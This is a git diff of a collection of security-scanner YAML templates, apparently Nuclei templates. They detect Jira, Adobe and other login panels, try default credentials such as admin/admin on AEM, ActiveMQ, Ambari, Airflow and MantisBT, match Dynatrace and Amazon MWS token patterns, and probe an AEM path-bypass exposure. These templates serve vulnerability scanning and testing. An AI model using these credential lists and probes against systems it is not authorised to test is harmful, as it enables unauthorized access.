shodan-query: http.component:"Atlassian Jira" tags: atlassian,jira - -http: +requests: - method: GET path: - "{{BaseURL}}/secure/popups/UserPickerBrowser.jspa" - matchers: - type: word words: - 'user-picker' - -# digest: 490a0046304402200087bccdda4eb25b5110e1333de30442f5744e55aa8f2b5db3cf5d01c54e3837022068d85868176036eb3b1420b5aa186064b791ca1486a60f7e1c8fed872ad1f402:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/jira_user_piker (copy 1).yaml b/poc/atlassian/jira_user_piker (copy 1).yaml new file mode 100644 index 0000000000..0a88ec36aa --- /dev/null +++ b/poc/atlassian/jira_user_piker (copy 1).yaml @@ -0,0 +1,22 @@ +id: jira-unauthenticated-user-picker + +info: + name: Jira Unauthenticated User Picker + author: TechbrunchFR + severity: info + metadata: + max-request: 1 + shodan-query: http.component:"Atlassian Jira" + tags: atlassian,jira + +http: + - method: GET + path: + - "{{BaseURL}}/secure/popups/UserPickerBrowser.jspa" + + matchers: + - type: word + words: + - 'user-picker' + +# digest: 490a0046304402200087bccdda4eb25b5110e1333de30442f5744e55aa8f2b5db3cf5d01c54e3837022068d85868176036eb3b1420b5aa186064b791ca1486a60f7e1c8fed872ad1f402:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/AVTECH-login-bypass.yaml b/poc/auth/AVTECH-login-bypass.yaml index a92a77b6e9..5319f73458 100644 --- a/poc/auth/AVTECH-login-bypass.yaml +++ b/poc/auth/AVTECH-login-bypass.yaml @@ -1,10 +1,12 @@ id: AVTECH-login-bypass + info: name: AVTECH 登录绕过 author: Str1am severity: critical reference: https://www.seebug.org/vuldb/ssvid-92494 tags: AVTECH,login,bypass + requests: - method: GET path: diff --git a/poc/auth/Dynatrace-token (copy 1).yaml b/poc/auth/Dynatrace-token (copy 1).yaml deleted file mode 100644 index 0371d213d9..0000000000 --- a/poc/auth/Dynatrace-token (copy 1).yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: dynatrace-token - -info: - name: Dynatrace Token - author: gaurang - severity: high - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - "dt0[a-zA-Z]{1}[0-9]{2}\\.[A-Z0-9]{24}\\.[A-Z0-9]{64}" \ No newline at end of file diff --git a/poc/auth/Dynatrace-token.yaml b/poc/auth/Dynatrace-token.yaml index 3fe0f4cf8f..0371d213d9 100644 --- a/poc/auth/Dynatrace-token.yaml +++ b/poc/auth/Dynatrace-token.yaml @@ -1,13 +1,15 @@ id: dynatrace-token + info: name: Dynatrace Token author: gaurang severity: high - tags: token,file + file: - extensions: - all + extractors: - type: regex regex: - - "dt0[a-zA-Z]{1}[0-9]{2}\\.[A-Z0-9]{24}\\.[A-Z0-9]{64}" + - "dt0[a-zA-Z]{1}[0-9]{2}\\.[A-Z0-9]{24}\\.[A-Z0-9]{64}" \ No newline at end of file diff --git a/poc/auth/JeeSite-default-login.yaml b/poc/auth/JeeSite-default-login.yaml index f737242f41..43ad9321e7 100644 --- a/poc/auth/JeeSite-default-login.yaml +++ b/poc/auth/JeeSite-default-login.yaml @@ -1,11 +1,9 @@ id: JeeSite-default-login - info: name: JeeSite默认密码 author: Str1am severity: high tags: JeeSite,login - requests: - raw: - | @@ -15,7 +13,6 @@ requests: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 username=F3EDC7D2C193E0B8DCF554C726719ED2&password=235880C505ACCDA5C581A4F4CDB81DA0&validCode= - matchers-condition: and matchers: - type: status @@ -25,4 +22,4 @@ requests: words: - "登录成功" part: body - condition: and \ No newline at end of file + condition: and diff --git a/poc/auth/Mantis-Default_login.yaml b/poc/auth/Mantis-Default_login.yaml new file mode 100644 index 0000000000..079862ba31 --- /dev/null +++ b/poc/auth/Mantis-Default_login.yaml @@ -0,0 +1,47 @@ +id: mantisbt-default-credential + +info: + name: MantisBT Default Admin Login + author: For3stCo1d + severity: high + description: A MantisBT default admin login was discovered. + reference: + - https://mantisbt.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + max-request: 1 + shodan-query: title:"MantisBT" + tags: mantisbt,default-login + +http: + - raw: + - | + POST /login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + return=index.php&username={{user}}&password={{pass}} + + attack: pitchfork + payloads: + user: + - administrator + pass: + - root + + matchers-condition: and + matchers: + - type: dsl + dsl: + - contains(tolower(header), 'mantis_secure_session') + - contains(tolower(header), 'mantis_string_cookie') + condition: and + + - type: status + status: + - 302 + +# digest: 490a0046304402205e3ba9080530721f7904ce8e6d98318f860b18d800d06370ccfd841b5de6ee8402201f73aac2837cd43bb2116deeddecd4ec504277ed0698a77d7c40c2a67bcf78b7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/Redmine-Default-Login.yaml b/poc/auth/Redmine-Default-Login.yaml deleted file mode 100644 index 66e6e4115a..0000000000 --- a/poc/auth/Redmine-Default-Login.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: RedMine-detect - -info: - name: RedMine Detection - author: YashVardhanTripathi - severity: info - description: RedMine Detection - metadata: - max-request: 1 - tags: tech, RedMine - -http: - - method: GET - path: - - "{{BaseURL}}/login" - host-redirects: true - matchers: - - type: word - part: header - words: - - "Set-Cookie: Redmine=" diff --git a/poc/auth/acemanager-login-23.yaml b/poc/auth/acemanager-login-24.yaml similarity index 100% rename from poc/auth/acemanager-login-23.yaml rename to poc/auth/acemanager-login-24.yaml diff --git a/poc/auth/activemq-default-login-44.yaml b/poc/auth/activemq-default-login-44.yaml deleted file mode 100644 index 9714139497..0000000000 --- a/poc/auth/activemq-default-login-44.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: activemq-default-login - -info: - name: Apache ActiveMQ Default Login - author: pdteam - severity: medium - description: Apache ActiveMQ default login information was discovered. - reference: https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html - tags: apache,activemq,default-login - -requests: - - raw: - - | - GET /admin/ HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - - payloads: - username: - - user - - admin - password: - - user - - admin - attack: pitchfork - matchers: - - type: word - words: - - 'Welcome to the Apache ActiveMQ Console of ' - - '

Broker

' - condition: and - -# Enhanced by mp on 2022/03/07 diff --git a/poc/auth/activemq-default-login-46.yaml b/poc/auth/activemq-default-login-46.yaml index 843f3e8cab..9714139497 100644 --- a/poc/auth/activemq-default-login-46.yaml +++ b/poc/auth/activemq-default-login-46.yaml @@ -5,8 +5,7 @@ info: author: pdteam severity: medium description: Apache ActiveMQ default login information was discovered. - reference: - - https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html + reference: https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html tags: apache,activemq,default-login requests: diff --git a/poc/auth/activemq-default-login-48.yaml b/poc/auth/activemq-default-login-48.yaml new file mode 100644 index 0000000000..a4dea884a5 --- /dev/null +++ b/poc/auth/activemq-default-login-48.yaml @@ -0,0 +1,29 @@ +id: activemq-default-login + +info: + name: Apache ActiveMQ Default Login + author: pdteam + severity: medium + tags: apache,activemq,default-login + +requests: + - raw: + - | + GET /admin/ HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + + payloads: + username: + - user + - admin + password: + - user + - admin + attack: pitchfork + matchers: + - type: word + words: + - 'Welcome to the Apache ActiveMQ Console of ' + - '

Broker

' + condition: and \ No newline at end of file diff --git a/poc/auth/adobe-component-login-89.yaml b/poc/auth/adobe-component-login-89.yaml new file mode 100644 index 0000000000..9b423f9a58 --- /dev/null +++ b/poc/auth/adobe-component-login-89.yaml @@ -0,0 +1,32 @@ +id: adobe-coldfusion-login + +info: + name: Adobe ColdFusion Component Browser Login Panel + author: dhiyaneshDK + description: An Adobe ColdFusion Component Browser login panel was detected. + severity: info + reference: + - https://www.exploit-db.com/ghdb/6846 + tags: panel,adobe,coldfusion + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - '{{BaseURL}}/CFIDE/componentutils/login.cfm' + - '{{BaseURL}}/cfide/componentutils/login.cfm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Component Browser Login' + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/poc/auth/adobe-component-login-90.yaml b/poc/auth/adobe-component-login-90.yaml deleted file mode 100644 index 1d46e94118..0000000000 --- a/poc/auth/adobe-component-login-90.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: adobe-coldfusion-login - -info: - name: Adobe ColdFusion Component Browser Login Panel - author: dhiyaneshDK - severity: info - description: An Adobe ColdFusion Component Browser login panel was detected. - reference: - - https://www.exploit-db.com/ghdb/6846 - classification: - cwe-id: CWE-200 - metadata: - shodan-query: http.component:"Adobe ColdFusion" - tags: panel,adobe,coldfusion - -requests: - - method: GET - path: - - '{{BaseURL}}/CFIDE/componentutils/login.cfm' - - '{{BaseURL}}/cfide/componentutils/login.cfm' - - matchers-condition: and - matchers: - - type: word - words: - - 'Component Browser Login' - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/poc/auth/adobe-component-login-91.yaml b/poc/auth/adobe-component-login-91.yaml new file mode 100644 index 0000000000..c0042aed5b --- /dev/null +++ b/poc/auth/adobe-component-login-91.yaml @@ -0,0 +1,23 @@ +id: adobe-component-login + +info: + name: Adobe Component Browser Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6846 + tags: panel,adobe + +requests: + - method: GET + path: + - '{{BaseURL}}/CFIDE/componentutils/login.cfm' + - '{{BaseURL}}/cfide/componentutils/login.cfm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Component Browser Login' + - type: status + status: + - 200 diff --git a/poc/auth/adobe-component-login-92.yaml b/poc/auth/adobe-component-login-92.yaml index cf0a6e2a19..cc39191db5 100644 --- a/poc/auth/adobe-component-login-92.yaml +++ b/poc/auth/adobe-component-login-92.yaml @@ -1,17 +1,15 @@ id: adobe-component-login - info: - name: Adobe Component Brower Login + name: Adobe Component Browser Login author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6846 - tags: panel - + tags: panel,adobe requests: - method: GET path: - '{{BaseURL}}/CFIDE/componentutils/login.cfm' - + - '{{BaseURL}}/cfide/componentutils/login.cfm' matchers-condition: and matchers: - type: word diff --git a/poc/auth/adobe-connect-central-login-93.yaml b/poc/auth/adobe-connect-central-login-96.yaml similarity index 100% rename from poc/auth/adobe-connect-central-login-93.yaml rename to poc/auth/adobe-connect-central-login-96.yaml diff --git a/poc/auth/adobe-experience-manager-login-105.yaml b/poc/auth/adobe-experience-manager-login-105.yaml deleted file mode 100644 index 4dbdef1e18..0000000000 --- a/poc/auth/adobe-experience-manager-login-105.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: adobe-experience-manager-login - -info: - name: Adobe Experience Manager Login Panel - author: dhiyaneshDK - description: An Adobe Experience Manager login panel was detected. - severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 - - https://business.adobe.com/products/experience-manager/adobe-experience-manager.html - tags: panel,aem,adobe - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - '{{BaseURL}}/libs/granite/core/content/login.html' - - matchers-condition: and - matchers: - - type: word - words: - - 'AEM Sign In' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/poc/auth/adobe-experience-manager-login-106.yaml b/poc/auth/adobe-experience-manager-login-106.yaml new file mode 100644 index 0000000000..2162a6646f --- /dev/null +++ b/poc/auth/adobe-experience-manager-login-106.yaml @@ -0,0 +1,23 @@ +id: adobe-experience-manager-login + +info: + name: Adobe-Experience-Manager + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 + tags: panel,aem,adobe + +requests: + - method: GET + path: + - '{{BaseURL}}/libs/granite/core/content/login.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'AEM Sign In' + + - type: status + status: + - 200 diff --git a/poc/auth/adobe-experience-manager-login-109.yaml b/poc/auth/adobe-experience-manager-login-109.yaml index 9148cd29f0..4dbdef1e18 100644 --- a/poc/auth/adobe-experience-manager-login-109.yaml +++ b/poc/auth/adobe-experience-manager-login-109.yaml @@ -3,15 +3,17 @@ id: adobe-experience-manager-login info: name: Adobe Experience Manager Login Panel author: dhiyaneshDK - severity: info description: An Adobe Experience Manager login panel was detected. + severity: info reference: + - https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 - https://business.adobe.com/products/experience-manager/adobe-experience-manager.html + tags: panel,aem,adobe classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: cwe-id: CWE-200 - metadata: - shodan-query: http.title:"AEM Sign In" - tags: panel,aem,adobe requests: - method: GET diff --git a/poc/auth/aem-default-login-140.yaml b/poc/auth/aem-default-login-140.yaml deleted file mode 100644 index 8072025a73..0000000000 --- a/poc/auth/aem-default-login-140.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: aem-default-login - -info: - name: Adobe AEM Default Login - author: random-robbie - severity: high - description: Adobe AEM default login credentials were discovered. - reference: - - https://experienceleague.adobe.com/docs/experience-manager-64/administering/security/security-checklist.html?lang=en - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: aem,default-login,adobe - - -requests: - - raw: - - | - POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Origin: {{BaseURL}} - Referer: {{BaseURL}}/libs/granite/core/content/login.html - - _charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true - - attack: pitchfork - payloads: - aem_user: - - admin - - grios - - replication-receiver - - vgnadmin - - aem_pass: - - admin - - password - - replication-receiver - - vgnadmin - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - condition: and - words: - - login-token - - crx.default - -# Enhanced by mp on 2022/03/23 diff --git a/poc/auth/aem-default-login-141.yaml b/poc/auth/aem-default-login-141.yaml index 30c718c891..66a6189c19 100644 --- a/poc/auth/aem-default-login-141.yaml +++ b/poc/auth/aem-default-login-141.yaml @@ -12,11 +12,10 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 8 shodan-query: http.component:"Adobe Experience Manager" tags: aem,default-login,adobe -http: +requests: - raw: - | POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 @@ -38,6 +37,7 @@ http: - anonymous - jdoe@geometrixx.info - aparker@geometrixx.info + aem_pass: - admin - password @@ -47,8 +47,8 @@ http: - anonymous - jdoe - aparker - stop-at-first-match: true + stop-at-first-match: true matchers-condition: and matchers: - type: status @@ -62,4 +62,4 @@ http: - crx.default condition: and -# digest: 4a0a004730450220222a3b892a7451300a85043c153a1fbe5d336d8c9f30c474065214bbac5906bc022100981335810687d458df2fb4ca0c7698ec9597777f599956f12f0a62b18f285727:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/23 diff --git a/poc/auth/aem-default-login-142.yaml b/poc/auth/aem-default-login-142.yaml index 0f201e7c6b..8072025a73 100644 --- a/poc/auth/aem-default-login-142.yaml +++ b/poc/auth/aem-default-login-142.yaml @@ -3,9 +3,17 @@ id: aem-default-login info: name: Adobe AEM Default Login author: random-robbie - severity: critical + severity: high + description: Adobe AEM default login credentials were discovered. + reference: + - https://experienceleague.adobe.com/docs/experience-manager-64/administering/security/security-checklist.html?lang=en + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: aem,default-login,adobe + requests: - raw: - | @@ -44,3 +52,5 @@ requests: words: - login-token - crx.default + +# Enhanced by mp on 2022/03/23 diff --git a/poc/auth/aem-login-status-169.yaml b/poc/auth/aem-login-status-167.yaml similarity index 100% rename from poc/auth/aem-login-status-169.yaml rename to poc/auth/aem-login-status-167.yaml diff --git a/poc/auth/aem-secrets.yaml b/poc/auth/aem-secrets.yaml new file mode 100644 index 0000000000..4ac0aaf165 --- /dev/null +++ b/poc/auth/aem-secrets.yaml @@ -0,0 +1,44 @@ +id: aem-secrets + +info: + name: AEM Secrets - Sensitive Information Disclosure + author: j3ssie & boobooHQ + severity: high + reference: + - https://www.linkedin.com/feed/update/urn:li:activity:7066003031271616513/ + description: | + Possible Juicy Files can be discovered at this endpoint. Search / Grep for secrets like hashed passwords ( SHA ) , internal email disclosure etc. + metadata: + max-request: 2 + verified: "true" + tags: aem,adobe,misconfig,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json" + - "{{BaseURL}}/..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json" + + headers: + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Language: en-US,en;q=0.9,hi;q=0.8 + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"jcr:uuid"' + - '"jcr:createdBy"' + - '"uri"' + condition: and + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 200 diff --git a/poc/auth/aims-password-mgmt-client-218.yaml b/poc/auth/aims-password-mgmt-client-219.yaml similarity index 100% rename from poc/auth/aims-password-mgmt-client-218.yaml rename to poc/auth/aims-password-mgmt-client-219.yaml diff --git a/poc/auth/aims-password-mgmt-client-221.yaml b/poc/auth/aims-password-mgmt-client-221.yaml new file mode 100644 index 0000000000..76998f88a1 --- /dev/null +++ b/poc/auth/aims-password-mgmt-client-221.yaml @@ -0,0 +1,17 @@ +id: aims-password-mgmt-client + +info: + name: Aims Password Management Client Detect + author: iamthefrogy + severity: info + tags: panel + +requests: + - method: GET + path: + - "{{BaseURL}}/aims/ps/" + + matchers: + - type: word + words: + - "Avatier Corporation" diff --git a/poc/auth/aims-password-portal-225.yaml b/poc/auth/aims-password-portal-225.yaml new file mode 100644 index 0000000000..800dd21cad --- /dev/null +++ b/poc/auth/aims-password-portal-225.yaml @@ -0,0 +1,22 @@ +id: aims-password-portal + +info: + name: AIMS Password Management Portal + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6576 + tags: panel,aims + +requests: + - method: GET + path: + - '{{BaseURL}}/aims/ps/default.aspx' + + matchers-condition: and + matchers: + - type: word + words: + - 'Password Management Client' + - type: status + status: + - 200 diff --git a/poc/auth/aims-password-portal.yaml b/poc/auth/aims-password-portal.yaml index 800dd21cad..eb21d8e0eb 100644 --- a/poc/auth/aims-password-portal.yaml +++ b/poc/auth/aims-password-portal.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6576 - tags: panel,aims + tags: panel requests: - method: GET diff --git a/poc/auth/airflow-default-login-236.yaml b/poc/auth/airflow-default-login-236.yaml index 7addbc0c1a..cef2568e5d 100644 --- a/poc/auth/airflow-default-login-236.yaml +++ b/poc/auth/airflow-default-login-236.yaml @@ -1,27 +1,18 @@ id: airflow-default-login - info: name: Apache Airflow Default Login author: pdteam - severity: high - description: An Apache Airflow default login was discovered. - reference: - - https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html + severity: critical + tags: airflow,default-login,apache + reference: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html metadata: shodan-query: title:"Sign In - Airflow" - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: airflow,default-login,apache - requests: - raw: - | GET /login/ HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - - | POST /login/ HTTP/1.1 Host: {{Hostname}} @@ -30,14 +21,12 @@ requests: Referer: {{BaseURL}}/admin/airflow/login username={{username}}&password={{password}}&_csrf_token={{csrf_token}} - attack: pitchfork payloads: username: - airflow password: - airflow - cookie-reuse: true extractors: - type: regex @@ -46,7 +35,6 @@ requests: internal: true regex: - 'type="hidden" value="(.*?)">' - req-condition: true matchers-condition: and matchers: @@ -56,9 +44,6 @@ requests: - 'contains(all_headers_2, "session=.")' - 'status_code_2 == 302' condition: and - - type: word words: - 'You should be redirected automatically to target URL: ' - -# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/alibaba-mongoshake-unauth-268.yaml b/poc/auth/alibaba-mongoshake-unauth-268.yaml new file mode 100644 index 0000000000..6de46b6ec7 --- /dev/null +++ b/poc/auth/alibaba-mongoshake-unauth-268.yaml @@ -0,0 +1,27 @@ +id: alibaba-mongoshake-unauth + +info: + name: Alibaba Mongoshake Unauth + author: pikpikcu + severity: info + tags: mongoshake,unauth + +requests: + - method: GET + path: + - '{{BaseURL}}/' + + matchers-condition: and + matchers: + + - type: word + words: + - '{"Uri":"/worker","Method":"GET"}' + - type: word + words: + - 'text/plain' + part: header + + - type: status + status: + - 200 diff --git a/poc/auth/alibaba-mongoshake-unauth-270.yaml b/poc/auth/alibaba-mongoshake-unauth-270.yaml index 6de46b6ec7..5d0b6ed712 100644 --- a/poc/auth/alibaba-mongoshake-unauth-270.yaml +++ b/poc/auth/alibaba-mongoshake-unauth-270.yaml @@ -4,19 +4,21 @@ info: name: Alibaba Mongoshake Unauth author: pikpikcu severity: info - tags: mongoshake,unauth + metadata: + max-request: 1 + tags: mongoshake,unauth,alibaba,misconfig -requests: +http: - method: GET path: - '{{BaseURL}}/' matchers-condition: and matchers: - - type: word words: - '{"Uri":"/worker","Method":"GET"}' + - type: word words: - 'text/plain' @@ -25,3 +27,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a00473045022100df73190b4cb70a8ce254319365eb46566529f720568dd75e7c78ef98947776d602201c21217186da8ecab8fb38921f040a238ce5817e862ef108277fdfd8e53e7b52:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/alphaweb-default-login.yaml b/poc/auth/alphaweb-default-login.yaml deleted file mode 100644 index 6532087439..0000000000 --- a/poc/auth/alphaweb-default-login.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: alphaweb-default-login - -info: - name: AlphaWeb XE Default Login - author: Lark Lab - severity: medium - tags: default-login - reference: https://wiki.zenitel.com/wiki/AlphaWeb - -requests: - - raw: - - | - GET /php/node_info.php HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - Referer: {{BaseURL}} - - attack: pitchfork - payloads: - username: - - admin - password: - - alphaadmin - - matchers-condition: and - matchers: - - type: word - words: - - "HW Configuration" - - "SW Configuration" - condition: and - - - type: status - status: - - 200 \ No newline at end of file diff --git a/poc/auth/amazon-mws-auth-token-11845.yaml b/poc/auth/amazon-mws-auth-token-11845.yaml index 8ed5b31604..0ab5703b9c 100644 --- a/poc/auth/amazon-mws-auth-token-11845.yaml +++ b/poc/auth/amazon-mws-auth-token-11845.yaml @@ -1,15 +1,11 @@ id: amazon-mws-auth-token-value info: - name: Amazon MWS Authentication Token - Detect + name: Amazon MWS Auth Token author: gaurang severity: medium - description: Amazon MWS authentication token was detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cwe-id: CWE-200 tags: token,file,amazon,auth + file: - extensions: - all @@ -18,6 +14,3 @@ file: - type: regex regex: - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" - -# Enhanced by md on 2023/05/04 -# digest: 4a0a00473045022100a22e9ab4357449ff0b0d0e1d56fd2a2a815900eb260c13cdc8ca5b4904508d76022030e701c98fff70a3c0e8174fe27c30c87c60b0a4acdc97555a71970ab6e5e83a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/amazon-mws-auth-token-282.yaml b/poc/auth/amazon-mws-auth-token-282.yaml index eb41de1dae..457df905b0 100644 --- a/poc/auth/amazon-mws-auth-token-282.yaml +++ b/poc/auth/amazon-mws-auth-token-282.yaml @@ -4,9 +4,11 @@ info: name: Amazon MWS Auth Token author: puzzlepeaches severity: info + metadata: + max-request: 1 tags: exposure,token,aws,amazon,auth -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -16,3 +18,5 @@ requests: part: body regex: - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" + +# digest: 4a0a00473045022040ac741be24d02135b0308a6d074f2d03fe6a7f1417abf455cea9942aefc7a5c022100954436ed9253b63aeda894501173c9013bdb27a97305b3e03e74001b84c73fc7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/amazon-mws-auth-token-283.yaml b/poc/auth/amazon-mws-auth-token-283.yaml index 457df905b0..28e8063f5e 100644 --- a/poc/auth/amazon-mws-auth-token-283.yaml +++ b/poc/auth/amazon-mws-auth-token-283.yaml @@ -1,22 +1,15 @@ id: amazon-mws-auth-token - info: name: Amazon MWS Auth Token author: puzzlepeaches severity: info - metadata: - max-request: 1 - tags: exposure,token,aws,amazon,auth - -http: + tags: exposure,token,aws +requests: - method: GET path: - "{{BaseURL}}" - extractors: - type: regex part: body regex: - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" - -# digest: 4a0a00473045022040ac741be24d02135b0308a6d074f2d03fe6a7f1417abf455cea9942aefc7a5c022100954436ed9253b63aeda894501173c9013bdb27a97305b3e03e74001b84c73fc7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/ambari-default-login-287.yaml b/poc/auth/ambari-default-login-287.yaml deleted file mode 100644 index 7d9efa4734..0000000000 --- a/poc/auth/ambari-default-login-287.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: ambari-default-login - -info: - name: Apache Ambari Default Login - author: pdteam - description: An Apache Ambari default admin login was discovered. - severity: high - reference: - - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: ambari,default-login,apache - -requests: - - raw: - - | - GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - payloads: - username: - - admin - password: - - admin - attack: pitchfork - matchers: - - type: word - words: - - '"Users" : {' - - 'AMBARI.' - condition: and - -# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/ambari-default-login-289.yaml b/poc/auth/ambari-default-login-289.yaml new file mode 100644 index 0000000000..b23093118b --- /dev/null +++ b/poc/auth/ambari-default-login-289.yaml @@ -0,0 +1,35 @@ +id: ambari-default-login + +info: + name: Apache Ambari Default Login + author: pdteam + severity: high + description: An Apache Ambari default admin login was discovered. + reference: + - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: ambari,default-login,apache + +requests: + - raw: + - | + GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + payloads: + username: + - admin + password: + - admin + attack: pitchfork + matchers: + - type: word + words: + - '"Users" : {' + - 'AMBARI.' + condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/ambari-default-login-290.yaml b/poc/auth/ambari-default-login-290.yaml index e251839b56..7d9efa4734 100644 --- a/poc/auth/ambari-default-login-290.yaml +++ b/poc/auth/ambari-default-login-290.yaml @@ -3,7 +3,14 @@ id: ambari-default-login info: name: Apache Ambari Default Login author: pdteam - severity: medium + description: An Apache Ambari default admin login was discovered. + severity: high + reference: + - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: ambari,default-login,apache requests: @@ -24,3 +31,5 @@ requests: - '"Users" : {' - 'AMBARI.' condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/amcrest-login-297.yaml b/poc/auth/amcrest-login-297.yaml index 19837aca9a..7455bbce1f 100644 --- a/poc/auth/amcrest-login-297.yaml +++ b/poc/auth/amcrest-login-297.yaml @@ -3,12 +3,19 @@ id: amcrest-login info: name: Amcrest Login author: DhiyaneshDK + description: An Amcrest LDAP user login was discovered. severity: info - reference: https://www.exploit-db.com/ghdb/7273 + reference: + - https://www.exploit-db.com/ghdb/7273 metadata: shodan-query: html:"amcrest" google-dork: intext:"amcrest" "LDAP User" tags: panel,camera,amcrest + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: 